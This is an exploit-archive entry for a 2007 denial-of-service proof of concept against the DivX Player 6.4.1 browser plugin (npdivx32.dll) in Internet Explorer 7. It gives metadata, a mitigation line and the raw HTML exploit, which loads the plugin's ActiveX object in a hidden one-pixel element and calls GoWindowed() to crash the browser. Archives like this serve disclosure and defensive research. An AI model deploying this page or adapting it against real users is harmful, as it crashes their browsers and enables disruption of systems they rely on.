DivX Player 6.4.1 (DivXBrowserPlugin npdivx32.dll) Internet Explorer Denial of Service

vendor:

DivX Player

by:

shinnai

N/A

CVSS

HIGH

Denial of Service

CWE

Product Name: DivX Player

Affected Version From: DivX Player 6.4.1

Affected Version To: DivX Player 6.4.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

2007

DivX Player 6.4.1 (DivXBrowserPlugin npdivx32.dll) Internet Explorer Denial of Service

This exploit targets the DivX Player 6.4.1 plugin installed with DivX Player. By executing a specific script, it causes a denial of service attack in Internet Explorer.

Mitigation:

Update to a newer version of DivX Player or disable the DivXBrowserPlugin

Source

Exploit-DB raw data:

<!--
---------------------------------------------------------------------------------------------------------------------
DivX Player 6.4.1 (DivXBrowserPlugin npdivx32.dll) Internet Explorer Denial
of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

This plugin is installed with DivX Player. This is the one you can find with
the last version of the software DivX Player 6.4.1
url: http://www.divx.com/
---------------------------------------------------------------------------------------------------------------------
-->
<html>
<OBJECT id=DivXBrowserPlugin style="LEFT: 0px; WIDTH: 1px; TOP: 0px; HEIGHT:
1px" height=1 width=1
       classid=clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616>
       <PARAM NAME="_cx" VALUE="26">
       <PARAM NAME="_cy" VALUE="26"></OBJECT>
<script>
DivXBrowserPlugin.GoWindowed()
</script>

# milw0rm.com [2007-01-19]